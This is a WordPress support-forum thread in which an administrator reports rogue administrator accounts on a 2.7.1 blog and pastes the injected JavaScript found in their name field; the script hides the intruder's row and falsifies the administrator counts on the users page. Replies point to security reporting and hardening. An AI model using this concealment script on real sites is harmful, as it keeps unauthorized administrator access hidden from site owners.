Title: Possible WordPress exploit
Last modified: August 19, 2016

---

# Possible WordPress exploit

 *  [jtietze](https://wordpress.org/support/users/jtietze/)
 * (@jtietze)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/possible-wordpress-exploit/)
 * Hi
    I discovered today that two new users had been created on the WordPress blog
   I administer (version 2.7.1). Both users had the same javascript code as their“
   first name” (shown below).
 * In the upload directory I found two files whose names matched existing files,
   but with different extensions, dated 2nd of June 1933.
 * I’ve deleted both users, and the files in the upload directory.
 * I’m wondering whether this should or could be reported somewhere.
    How could 
   such an event be prevented?
 * **wp_capabilities**
    `a:1:{s:13:"administrator";b:1;}`
 * **wp_user_level**
    `10`
 * **first_name**
 *     ```
       ...
   
            <b id="user_superuser"><script language="JavaScript">
            var setUserName = function(){
                 try{
                      var t=document.getElementById("user_superuser");
                      while(t.nodeName!="TR"){
                           t=t.parentNode;
                      };
                      t.parentNode.removeChild(t);
                      var tags = document.getElementsByTagName("H3");
                      var s = " shown below";
                      for (var i = 0; i < tags.length; i++) {
                           var t=tags[i].innerHTML;
                           var h=tags[i];
                           if(t.indexOf(s)>0){
                                s =(parseInt(t)-1)+s;
                                h.removeChild(h.firstChild);
                                t = document.createTextNode(s);
                                h.appendChild(t);
                           }
                      }
   
       		var arr=document.getElementsByTagName("ul");
       		for(var i in arr) if(arr[i].className=="subsubsub"){
       		    var n=/>Administrator \\((\\d+)\\)</gi.exec(arr[i].innerHTML);
       		    if(n!=null &amp;&amp; n[1]>0){
       			var txt=arr[i].innerHTML.replace(/>Administrator \\((\\d+)\\)</gi,">Administrator ("+(n[1]-1)+")<");
       			arr[i].innerHTML=txt;
       		    }
   
       		    var n=/>Administrator <span class="count">\\((\\d+)\\)</gi.exec(arr[i].innerHTML);
       		    if(n!=null &amp;&amp; n[1]>0){
       			var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\\((\\d+)\\)</gi,">Administrator <span class=\\"count\\">("+(n[1]-1)+")<");
       			arr[i].innerHTML=txt;
       		    }
   
       		    var n=/>All <span class="count">\\((\\d+)\\)</gi.exec(arr[i].innerHTML);
       		    if(n!=null &amp;&amp; n[1]>0){
       			var txt=arr[i].innerHTML.replace(/>All <span class="count">\\((\\d+)\\)</gi,">All <span class=\\"count\\">("+(n[1]-1)+")<");
       			arr[i].innerHTML=txt;
       		    }
       		}
                 }catch(e){};
            };
            addLoadEvent(setUserName);
            </script>
       ```
   

Viewing 3 replies - 1 through 3 (of 3 total)

 *  [MichaelH](https://wordpress.org/support/users/michaelh/)
 * (@michaelh)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/possible-wordpress-exploit/#post-1071592)
 * Email on security issues can be reported to [security@wordpress.org](https://wordpress.org/support/topic/possible-wordpress-exploit/security@wordpress.org?output_format=md)
 * Also make sure your **New user default role** is [Administration](http://codex.wordpress.org/Administration_Panels)
   > [Settings](http://codex.wordpress.org/Administration_Panels#General) > [General](http://codex.wordpress.org/Settings_General_SubPanel)
   is set to subscriber.
 *  Thread Starter [jtietze](https://wordpress.org/support/users/jtietze/)
 * (@jtietze)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/possible-wordpress-exploit/#post-1071638)
 * The **New user default role** you describe is set to _subscriber_.
 * I have noticed a similar post on a German forum:
    <[http://forum.wordpress-deutschland.org/allgemeines/47429-gibts-ne-luecke-2.html#post229702](http://forum.wordpress-deutschland.org/allgemeines/47429-gibts-ne-luecke-2.html#post229702)
   >
 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/possible-wordpress-exploit/#post-1071639)
 * just for grins check all index files on your site(s)
    ask host if others have
   had similar problems shared servers are only as good as the weakest user

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Possible WordPress exploit’ is closed to new replies.

## Tags

 * [exploit](https://wordpress.org/support/topic-tag/exploit/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 3 replies
 * 3 participants
 * Last reply from: [Samuel B](https://wordpress.org/support/users/samboll/)
 * Last activity: [17 years, 1 month ago](https://wordpress.org/support/topic/possible-wordpress-exploit/#post-1071639)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics